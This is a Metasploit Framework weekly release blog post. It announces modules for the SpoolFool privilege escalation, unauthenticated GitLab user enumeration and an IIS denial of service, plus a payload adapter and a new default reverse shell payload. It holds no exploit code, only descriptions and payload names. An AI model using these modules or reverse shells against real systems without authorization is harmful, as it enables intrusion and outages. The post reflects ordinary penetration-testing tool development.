Metasploit Weekly Wrap-Up
Discription

## CVE-2022-21999 – SpoolFool

![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/03/metasploit-ascii-1-2.png)

Our very own [Shelby Pace]() has added a new module for the [CVE-2022-21999 SpoolFool privilege escalation vulnerability](). This escalation vulnerability can be leveraged to achieve code execution as SYSTEM. This new module has successfully been tested on Windows 10 (10.0 Build 19044) and Windows Server 2019 v1809 (Build 17763.1577).

## CVE-2021-4191 – Gitlab GraphQL API User Enumeration

[Jake Baines]() has contributed a new module for [CVE-2021-4191](), which queries the GitLab GraphQL API to acquire the list of GitLab users without authentication. There’s some news coverage from earlier this month [here](). The module works on all GitLab versions from 13.0 up to 14.8.2, 14.7.4, and 14.6.5.

## Adapted Payloads

[Spencer McIntyre]() has [added a new payload type]() that allows existing modules to be adapted for new scenarios. For example, modern exploits often deliver OS command payloads while Metasploit users would prefer to have more fully-featured native payloads (like Meterpreter delivered) and these scenarios are often special cases handled by the module author. Metasploit’s new payload adapters allow payloads from one architecture to be converted to another for seamless compatibility with a wider variety of exploit modules. The first entry for this new type is an adapter that converts Python payloads to OS command payloads, allowing any exploit capable of executing a Unix Command payload to deliver a Python Metepreter in memory. For additional ease of use, the correct Python binary is automatically determined.

## New module content (3)

* [Windows IIS HTTP Protocol Stack DOS]() by Axel Souchet, Maurice LAMBERT, Max, and Stefan Blair, which exploits [CVE-2021-31166]() – A new module has been added that exploits [CVE-2021-31166](), a UAF bug in `http.sys` when parsing `Accept-Encoding` headers, to cause a BSoD and denial of service on vulnerable IIS servers.
* [GitLab GraphQL API User Enumeration]() by jbaines-r7 and mungsul, which exploits [CVE-2021-4191]() – This adds an auxiliary module that enumerates Gitlab user accounts via the GraphQL API which does not require authentication when querying user information.
* [CVE-2022-21999 SpoolFool Privesc]() by Oliver Lyak and Shelby Pace, which exploits [CVE-2022-21999]() – This adds a module targeting SpoolFool (AKA [CVE-2022-21999]()), a local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.

## Enhancements and features (2)

* [#16186]() from [zeroSteiner]() – This adds an additional Adapter payload type which can be used in a scenario such as wanting to deliver a full Meterpreter session from a command payload.
* [#16262]() from [zeroSteiner]() – This updates the default payload selection so that `cmd/unix/reverse_bash` is chosen over `cmd/unix/reverse_netcat` by default unless `RequiredCmd` is set such that the module cannot execute Bash payloads.

## Bugs fixed (7)

* [#16316]() from [smashery]() – This ensures individual modules no longer accidentally shut down joint services that are used across multiple modules/handlers etc, such as HTTP servers. Modules will now correctly unregister interest in the global service, and if there are no longer any interested modules in the running global service, it will be shut down correctly.
* [#16324]() from [smashery]() – This fixes an issue in the DNS native server module where the server would crash upon receiving a query.
* [#16326]() from [zeroSteiner]() – This fixes SMB signing detection for the `scanner/smb/smb_version` module when the target server has SMB1 disabled.
* [#16332]() from [bcoles]() – This change fixes a bug in APK injection where the native libraries would not automatically be aligned with zipalign, and would fail to install on a device.
* [#16334]() from [bcoles]() – This change fixes a bug where APK files that were not signed with the v1 scheme would fail during the signing phase of APK file injection with msfvenom.
* [#16347]() from [zeroSteiner]() – This updates the `normalize_host` method so that when it attempts and fails to resolve a hostname to an IP address, it will return `nil` instead of raising an exception. Previously this exception would result in modules like `auxiliary/gather/enum_dns` crashing instead of saving the information it had managed to gather on the target so far.
* [#16350]() from [sjanusz-r7]() – This fixes an unintentional crash when using `payload/windows/x64/encrypted_shell_reverse_tcp` without having a database configured

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate`
and you can get more details on the changes since the last blog post from
GitHub:

* [Pull Requests 6.1.33…6.1.34]()
* [Full diff 6.1.33…6.1.34]()

If you are a `git` user, you can clone the [Metasploit Framework repo]() (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers]() or the
[binary installers]() (which also include the commercial edition).Read More

Back to Main

Subscribe for the latest news: